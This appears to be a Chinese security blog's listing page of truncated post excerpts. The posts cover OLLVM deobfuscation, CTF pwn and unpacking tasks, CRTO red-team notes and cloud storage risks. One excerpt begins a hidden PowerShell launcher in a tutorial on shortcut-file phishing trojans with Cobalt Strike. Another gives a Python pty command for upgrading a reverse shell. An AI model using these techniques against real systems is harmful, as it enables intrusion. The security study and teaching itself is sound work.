说明1、本文是对特定样本ollvm的分析,提供一种反混淆的方法思路,包含详细的分析过程和针对该样本的反混淆脚本,不包含通用的ollvm反混淆脚本。2、本文仅分析init_array中的第一个函数sub...
06月14日13 views评论ollvm
反混淆
ollvm分析及反混淆
06月14日13 views评论ollvm
反混淆
06月14日13 views评论ollvm
反混淆
寻找变形Python解释器中opcode映射关系的思路
创建: 2023-05-08 21:04更新: 2023-05-09 10:39https://scz.617.cn/python/202305082104.t...
05月09日安全开发23 views评论dis
dropbox
制作快捷方式钓鱼木马
用到的工具:Cobalt Strike这个基础用法我们基于kali的系统,首先打开我们的cs,进行基础配置(监听器之类)然后我们生成一个链接powershell.exe -nop -w hidden ...
03月29日193 views评论powershell
木马
crto笔记
来源于Secde0师傅的投稿Crto NotesReconOrganisational需要获取目标集团的人员姓名、组织架构、邮箱信息TechnicalPassvie:被动侦查依赖第三方来源,如谷歌、L...
01月11日72 views评论powershell
vbs
复杂的栈迁移
题目libc是2.23,注意事项:io、nop首先这道题看上去和正常的栈迁移没什么区别,但是实际上坑处有点多,先看看程序:还比较好,然后看看main:第一个是初始化io函数,我们进vul里面看看第一次...
12月26日24 views评论puts
ret
使用阿里云OSS可能存在的两个安全风险
攻防演练期间由于比较劳累,失误把两篇原本应该发在项目发布号上的项目公告发在了NOP Team 这个公众号上,实在是有些尴尬在以后每次发布技术文章的时候,都会将项目发布说明带上,说明内容都是一样的,如果...
08月20日1,107 views评论安全风险
渗透测试
一些命令
from:http://evi1cg.meLinuxLinux反弹shell后,方便的交互:python -c 'import pty; pty.spawn("/bin/bash")'WindowsP...
03月17日安全闲碎47 views评论exe
powershell
【周四答疑】很多大佬说的 nop 到底是啥?
红包题 武穆遗书
> > 红包题 武穆遗书 shenshuoyaoyouguang upx壳 脱壳过程 调试器载入 向下拉,找到这种jmp 后面都是0000 的代码,下断 这个jmp 过后就是oep 使用x...
01月05日52 views评论ida
jmp